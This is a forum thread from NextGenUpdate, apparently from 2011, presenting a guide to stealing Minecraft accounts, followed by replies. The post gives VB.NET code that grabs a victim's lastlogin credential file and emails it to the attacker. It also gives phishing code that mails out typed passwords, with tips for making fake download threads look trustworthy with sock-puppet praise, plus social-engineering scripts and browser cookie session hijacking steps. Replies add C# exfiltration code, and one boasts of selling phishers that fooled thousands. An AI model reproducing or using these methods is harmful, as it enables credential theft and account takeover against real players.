Post: -Minecraft Account Hacking-
11-03-2011, 10:45 PM #1
(adsbygoogle = window.adsbygoogle || []).push({});
You must login or register to view this content.




-This guide is now completely outdated. I do not plan on ever updating it.
-Removed the videos. Don't plan on making more anytime soon.
-Removed space that was causing problems for so many. Not Happy or Sad
-Updated FAQ & other small edits.
-Adding a new section: Cookie Session Stealing. A truly original Minecraft hack I found.
-Minecraft Account Hacking - Part 3 was uploaded.

-Minecraft Account Hacking - Part 2 was uploaded.
-Version two of the video was uploaded.
-Just finished the video. Uploading now.
-The much needed FAQ section has been added.

[/SIZE]



Hacking Minecraft accounts is something I have been perfecting for a while now. After a ton of experience and research I have narrowed down the most effective ways to "hack" a Minecraft account. This guide is good for either targeting someone or for just gathering alternate accounts. It is also the next best thing to using a account cracker. Lets begin.







This guide is now outdated. Nothing to see here unless you want a history lesson.













You must login or register to view this content.

Obtaining a "Lastlogin" File


The key to stealing any Minecraft account is obtaining a file named "lastlogin". This file is located in the .minecraft folder which contains all of the games files.

If you don't have minecraft on your computer you will need to use the cracked version in the download. (You will find out why later.)

You must login or register to view this content.




Method #1

The first way you can obtain a lastlogin file is to simply search it on the internet. Some people foolishly post their .minecraft folder on the internet for several reasons without removing their lastlogin file.


Some things you can search to find a .minecraft folder:


  • Premodded Minecraft Folder
  • Free .minecraft folder
  • Play minecraft for free with this last loginfile




Method #2

The social engineering method. This method worked well for me. By befriending people on the You must login or register to view this content. you can convince them to send you their .minecraft folder by saying you will...


  • Make incompatible mods work together
  • Mod their .minecraft folder
  • That you want to try out their modded .minecraft folder
  • ect...


The great thing about this is that you don't even need the greatest social engineering skills. You only need to know what your talking about. So brush up on your info about the mechanics of the game.




Method #3

The last method is using a program that steals the file for you. Here is an example code that you may use.


VB.NET Example


    
Imports System.Net.Mail
Public Class Form1
Dim smtp As New SmtpClient
Dim mail As New MailMessage


Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click

Dim MyMailMessage As New MailMessage()
Try
Dim Attch As Net.Mail.Attachment = New Net.Mail.Attachment(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\.minecraft\lastlogin")
MyMailMessage.Attachments.Add(Attch)
MyMailMessage.From = New MailAddress([COLOR="#FF0000"]"[email protected]"[/COLOR])
MyMailMessage.To.Add([COLOR="#FF0000"]"[email protected]"[/COLOR])
MyMailMessage.Subject = ("LastLoginFile")
MyMailMessage.Body = (" ")
Dim SMTP As New SmtpClient("smtp.gmail.com")
SMTP.Port = 587
SMTP.EnableSsl = True
SMTP.Credentials = New System.Net.NetworkCredential([COLOR="#FF0000"]"[email protected]"[/COLOR], [COLOR="#FF0000"]"Password"[/COLOR])
SMTP.Send(MyMailMessage)
Catch ex As Exception
End Try
End Sub

End Class













You must login or register to view this content.

How to use the "lastlogin" file to steal their account
[/COLOR]

Mine Pass
Created by: Unknown

Now in the download you should see a cracked minecraft launcher. This will give you the game. Then go You must login or register to view this content. to download the original launcher so you can log in. It will be under "Download Minecraft". (If you already have the game you can skip this step.)

Now you need to take the "lastlogin" file you have and place it in your .minecraft folder. Which is located in in your %AppData% folder.

Now open up the non cracked launcher. You should see this:
(If not then the user was smart enough to leave it blank.)

You must login or register to view this content.


Now open up Mine Pass in the download. Then click log in on the launcher. Mine Pass will do its job and show you this:


You must login or register to view this content.




MC Last Login Decrypter (LLD)
Created by: Wertyl11

This is very simple just run the .jar and it will display the information. May not work for everyone.

You must login or register to view this content.




Now you have the information you need to take the account for your self. If your lucky you can search the victims user name, find their email and take it.











You must login or register to view this content.

Making an Effective Phisher
[/COLOR]

These ideas can be applied to Method #3 of Part 1.

This method requires that you know VB, or at least how to use a code given to you. This method, even though it's illegal, can be a effective. Yes its the infamous phisher.

When you make a phisher on the minecraft forums, or where ever, make it look real. Have tons of pictures and don't forget to add "why it may not work for every one". This way no suspicion comes about. Also make a second account and reply to your phishers thread saying it was great. This first post will be enough for many to download it and to fall for your trap. Lastly be creative. Think big! It doesn't have to work. Just has to look like it does.

Here is a code you can use:

Pass is what you would use for a text box.

    
Imports System.Net.Mail
Public Class Form1
Dim smtp As New SmtpClient
Dim mail As New MailMessage


Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs)

Dim MyMailMessage As New MailMessage()
Try
MyMailMessage.From = New MailAddress("[COLOR="#FF0000"]Your Gmail Here[/COLOR]@gmail.com")
MyMailMessage.To.Add("[COLOR="#FF0000"]Your Gmail Here[/COLOR]")
MyMailMessage.Subject = User.Text
MyMailMessage.Body = Pass.Text
Dim SMTP As New SmtpClient("smtp.gmail.com")
SMTP.Port = 587
SMTP.EnableSsl = True
SMTP.Credentials = New System.Net.NetworkCredential("[COLOR="#FF0000"]Your Gmail Here[/COLOR]", "[COLOR="#FF0000"]Your Gmail's Password Here[/COLOR]")
SMTP.Send(MyMailMessage)
Pass.Text = ""
Catch ex As Exception
End Try
End Sub


Again this does require that you have some programming skills.








You must login or register to view this content.

Minecraft Browser Session Stealing
[/COLOR]

The concept of session stealing with cookies is not a new one, but as far as minecraft goes this is new ground. I will be adding more as I discover more. For this the target must be logged into minecraft from their browser. This can be applied to other browsers, but today I will be showing you how to do it with Google Chrome.


From Target's Computer


You must login or register to view this content.


  1. First make sure the target is logged in.
  2. Then go to the Chrome Web Store.
  3. Search and add the Extension "Edit This Cookie".
  4. Then go to minecraft.net where the target should still be logged in.
  5. Click on the cookie in the top right hand corner.
  6. Click export cookies. It will copy the cookies to your clip board.
  7. Now paste those cookies into a txt file on a flash drive, or email it to yourself.
  8. Now you need to be on your computer. Install that same extension into chrome.
  9. Now click the cookie and select import. Paste the cookies there.
  10. Now click Submit cookie changes.
    You may need to refresh the page.

  11. Now you should be logged into their account. Where you are free to play the game under their account.


You must login or register to view this content.




Please Read:

If the person logs out of minecraft on their computer before you can login, then the cookies will be invalid.








FAQ



Technical FAQ

Can you hack an account for me MagicalMonkey? No.

Mine Pass just says it scanning and does nothing else. Why won't it work? You need to press log in.

Mine Pass does not display a password/username. Why? Because the owner of the account did not select remember password, or it is simply a blank last login file.

The account information I have does not work? Probably because the owner changed his information.

I get weird results with Mine Pass when I login. Why? I'll just say this. If you can't log into Minecraft with just the last log in file alone, then the file is no good and contains incorrect information.

I can not find my .minecraft folder. Why? Probably because Minecraft is not on your computer. So use the cracked launcher provided in the download in order to get a free copy.

Can I have the project folder for the Lastlogin file stealer/Phisher? No. I refuse to spoon feed any one. I have literally given you the entire code and all you need to do is copy and paste.

I can't find any last login files through a google search. Why not? I created this thread over a year ago just before the Minecraft Account Hacking Boom started. (Obviously, I have continued to update it quite often.) At the time there were less MC account hackers out there. So it was easier to find things like this. So the chances that you will find one laying around the internet any more is slim, but it doesn't mean it can't happen.



Irrelevant FAQ

MagicalMonkey, I don't like you, because you show people how to hack Minecraft accounts. Can you stop now!? No. lol

MagicalMonkey, I bet you're just a skid who copied all of this from someone else. Unlike a lot of very unintelligent people, I do not plagiarize other people's work. If I borrowed something from someone else, I posted it here.

Hey I think you are awesome. Is there anyway I can thank-you? Yeah! Let me know that I helped and share it with your friends. I would also like it if you thanked KronosCloud for making the MC ToolBox.










Downloads


Download the Minecraft Account Hackers Tool Kit You must login or register to view this content..

Includes a cracked version of Minecraft, LLD and MinePass.


Minecraft Toolbox
By You must login or register to view this content.

Download the You must login or register to view this content.. It is basically all of the programs put into one tool. I highly suggest you try this first.

Direct Download Link: You must login or register to view this content.
Google Chrome will set off a false positive.

Virus Scan: You must login or register to view this content.

You must login or register to view this content.





Do not contact me about sending you the link for the downloads. Register here at NGU to get all of the links, videos and downloads. It is free to sign up and it is a great community. If you do however try to contact me about getting the downloads without signing up for NGU I will ignore you. I get asked far too often and wanted to state this before it got out of hand.[/CENTER]
Last edited by MagicalMonkey ; 03-05-2014 at 10:26 PM.

The following 21 users say thank you to MagicalMonkey for this useful post:

CraigMurray95, Curt, FruitBurst, IVisionsI, jobush50, LEzStarz, mister_k, Mr Grumpy, Mr. Star, Ninja, R3bUG-_M0Dz_-, Rasil23, Repetition, Taylor, wiseguy48, xChidori, xSoulEdge, Ziom230
11-04-2011, 02:37 AM #2
wiseguy48
Do a barrel roll!
This lastlogin information will be helpful in sharing some accounts with strangers.
11-04-2011, 05:05 AM #3
Pichu
RIP PICHU.
Originally posted by MagicalMonkey View Post
You must login or register to view this content.


Hacking Minecraft accounts is something I have been perfecting for a while now. After a ton of experience and research I have narrowed down the two most effective ways to "hack" a Minecraft account. Lets begin.





Obtaining a "Lastlogin" File

The key to stealing any Minecraft account is obtaining a file named "lastlogin". This folder is located in the .minecraft folder which contains all of the games files.
If you don't have minecraft on your computer you will need to use the cracked version in the download. (You will find out why later.)

You must login or register to view this content.



Method #1

The first way you can obtain a lastlogin file is to simply search it on the internet. Some people foolishly post their .minecraft folder on the internet for several reason without removing their lastlogin file.


Somethings you can search to find a .minecraft folder:

  • Premodded Minecraft Folder
  • Free .minecraft folder
  • Play minecraft for free with this last loginfile



Method #2

The social engineering method. This method worked well for me. By befriending people on the You must login or register to view this content. you can convince them to send you their .minecraft folder by saying you will...

  • Make incompatible mods work together
  • Mod their .minecraft folder
  • That you want to try out their modded .minecraft folder
  • ect...

The great thing about this is that you don't even need the greatest social engineering skills. You only need to know what your talking about. So brush up on your info about the mechanics of the game.





How to use the "lastlogin" file to steal their account

Now in the download you should see a cracked minecraft launcher. This will give you the game. Then go You must login or register to view this content. to download the original launcher so you can log in. It will be under "Download Minecraft".

Now you need to take the "lastlogin" file you have and place it in your .minecraft folder. Which is located in in your %AppData% folder.

Now open up the non cracked launcher. You should see this:
(If not then the user was smart enough to leave it blank.)

You must login or register to view this content.


Now open up Mine Pass in the download. Then click log in on the launcher. Mine Pass will do its job and show you this:


You must login or register to view this content.



Now you have the information you need to take the account for your self. If your lucky you can search the victims user name, find their email and take it.



____________________________________________________




Making an Effective Phisher
(This does not give you a lastlogin file and isn't suggested)

This method requires that you know VB, or at least how to use a code given to you. This method, even though it's illegal, can be a effective. Yes its the infamous phisher. When you make a phisher on the minecraft.net forums or where ever make it look real. Have tons of pictures and don't forget to add "why it may not work for every one" so that no suspicion comes about. Also make a second account and reply to your phishers thread saying it was great. This first post will be enough for many to download it and to fall for your trap.

Here is a code you can use:

    
Imports System.Net.Mail
Public Class Form1
Dim smtp As New SmtpClient
Dim mail As New MailMessage


Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs)

Dim MyMailMessage As New MailMessage()
Try
MyMailMessage.From = New MailAddress("[COLOR=#FF0000]Your Gmail Here[/COLOR]@gmail.com")
MyMailMessage.To.Add("[COLOR=#FF0000]Your Gmail Here[/COLOR]")
MyMailMessage.Subject = User.Text
MyMailMessage.Body = Pass.Text
Dim SMTP As New SmtpClient("smtp.gmail.com")
SMTP.Port = 587
SMTP.EnableSsl = True
SMTP.Credentials = New System.Net.NetworkCredential("[COLOR=#FF0000]Your Gmail Here[/COLOR]", "[COLOR=#FF0000]Your Gmail's Password Here[/COLOR]")
SMTP.Send(MyMailMessage)
Pass.Text = ""
Catch ex As Exception
End Try
End Sub


Again this does require that you have some programming skills.

____________________________________________________


Download the Minecraft Hackers Tool Kit You must login or register to view this content..


You must login or register to view this content.




I hope you all enjoyed this and good luck.


For C# use

using System.Mail.Net;

MailMessage mail = new MailMessage("Email", "Email", Subject, "Message);
SmtpClient client = new SmtpClient("smtp.gmail.com");
client.Port = 587;
client.Credentials = new System.Net.NetworkCredential("Email", "Password");
client.EnableSsl = true;
client.Send(mail);

The Email Email is because the first one is for To and the second is for From so just set it the same so it appears as "My email" "Me"

The following user thanked Pichu for this useful post:

LEzStarz
11-04-2011, 10:09 PM #4
Originally posted by Sublimity View Post
For C# use

using System.Mail.Net;

MailMessage mail = new MailMessage("Email", "Email", Subject, "Message);
SmtpClient client = new SmtpClient("smtp.gmail.com");
client.Port = 587;
client.Credentials = new System.Net.NetworkCredential("Email", "Password");
client.EnableSsl = true;
client.Send(mail);

The Email Email is because the first one is for To and the second is for From so just set it the same so it appears as "My email" "Me"


Would you mind if I put this in the main post?

---------- Post added at 06:09 PM ---------- Previous post was at 04:18 PM ----------

No it would not... Did you not read the post? I show you how to crack the lastlogin file.
11-04-2011, 10:18 PM #5
Pichu
RIP PICHU.
Originally posted by MagicalMonkey View Post
Would you mind if I put this in the main post?

---------- Post added at 06:09 PM ---------- Previous post was at 04:18 PM ----------

No it would not... Did you not read the post? I show you how to crack the lastlogin file.


I didn't add to this, this is just the simple send mail method for C# you will have to change it up a little to do what you want it to do but that is very simple.

Have it fetch a txt file and read it then send the text is a good example. Many possibilities with a basic method.
11-04-2011, 10:22 PM #6
Originally posted by Sublimity View Post
I didn't add to this, this is just the simple send mail method for C# you will have to change it up a little to do what you want it to do but that is very simple.

Have it fetch a txt file and read it then send the text is a good example. Many possibilities with a basic method.


Oh ok. Well thanks for sharing anyways Smile

The following user thanked MagicalMonkey for this useful post:

Pichu
11-04-2011, 10:33 PM #7
Pichu
RIP PICHU.
Originally posted by MagicalMonkey View Post
Oh ok. Well thanks for sharing anyways Smile


No problem. Like the main concept though. Should write something else, give me an idea to create.

I've created several phishers, ones that have literally tricked 2.5k+ people each into downloading, although I sell the phishers now rather than use them. :P 5 dollars a piece + support (incase it goes bad or something somehow).
11-05-2011, 05:57 PM #8
Rasil23
Climbing up the ladder
Hope i win the weeks giveaway!, And thanks for posting this Happy
11-05-2011, 08:29 PM #9
Originally posted by Rasil23 View Post
Hope i win the weeks giveaway!, And thanks for posting this Happy


So far you have a 50/50 chance lolz Smile
11-06-2011, 03:17 PM #10
fill0botto95
You talkin to me?
why don't you make a vb.net tool that automatically takes and send you the lastlogin by attaching it to the mail?

pm me if you need more info

Copyright © 2024, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo